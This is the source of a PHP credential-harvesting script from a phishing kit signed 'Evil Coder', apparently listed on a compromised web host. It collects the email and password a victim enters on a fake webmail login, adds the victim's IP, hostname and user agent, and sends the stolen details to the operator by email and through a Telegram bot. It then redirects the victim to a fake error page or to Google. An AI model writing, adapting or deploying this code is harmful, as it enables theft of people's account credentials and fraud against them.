| Current File : /home/missente/public_html/cKlZG/upgrades/index/evil_coder/proc/evilc_login.php |
<?php
/*
██████████ ███████ █████████ █████ █████ ████████
░░███░░░░░█ ░░░░░███ ███░░░░░███ ███░░░███ ░░███ ███░░░░███
░███ █ ░█████ ████████░███ ███ ░░░ ███ ░░███ ███████░░░ ░██████████
░██████ ░░███ ░░██░░███░███ ░███ ░███ ░██████░░███ ██████░░███░░███
░███░░█ ░███ ░███░███░███ ░███ ░███ ░██░███ ░███ ░░░░░░██░███ ░░░
░███ ░ ░░███ ███ ░███░███ ░░███ ██░░███ ███░███ ░███ ███ ░██░███
██████████░░█████ █████████ ░░█████████ ░░░█████░ ░░███████░░█████████████
░░░░░░░░░░ ░░░░░ ░░░░░░░░░ ░░░░░░░░░ ░░░░░░ ░░░░░░░░ ░░░░░░░░░░░░░
ICQ & TELEGRAM : @evilcoder1337
*/
ob_start();
session_start();
include("../../settings.php");
include "../../antibots/recon.php";
if (isset($_POST['email'])) {
$email = $_SESSION['email'] = $_POST['email'];
$evil_pass = $_SESSION['evil_pass'] = $_POST['evil_pass'];
$ip = "{$_SESSION['ip']}";
$hostname = gethostbyaddr($ip);
$useragent = $_SERVER['HTTP_USER_AGENT'];
$code = <<<EOT
+===============
| W3BM4IL L0GIN :
+================
|[👤 EMAIL ] : {$_SESSION['email']}
|[🔑PASSWORD ] : {$_SESSION['evil_pass']}
|
+ #------ EVIL CODER-IP INFORMATION ------#
|IP : $ip
|IP lookup : https://ip-api.com/$ip
|OS : $useragent
|
+============== [ BY @evilcoder1337 ] ==============
\r\n\r\n
EOT;
$subject = "W3BM4IL BY Evil-C0d3r From $ip and From (phrase) {$_SESSION['phrase']}";
$headers = "From: Evil-C0d3r <evilc0d3r@yandex.com>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
@mail($to, $subject, $code, $headers);
if ($sendtotelegram=="yes"){
$txt = $code;
$send = ['chat_id'=>$chat_id,'text'=>$txt];
$website_telegram = "https://api.telegram.org/bot{$bot_url}";
$ch = curl_init($website_telegram . '/sendMessage');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($send));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
if ($show_error_login=="yes") {
$invalid = rand(1,10000000000000);
$Adoo=date("D,M,d,Y-g:ia");
exit(header("Location: ../../error.php?error=$invalid+_time:$Adoo"));
}
else{
exit(header("Location:https://www.google.com/")); // go to main page officiel..
}
}
else{
header("HTTP/1.0 404 Not Found");
exit();
}
?>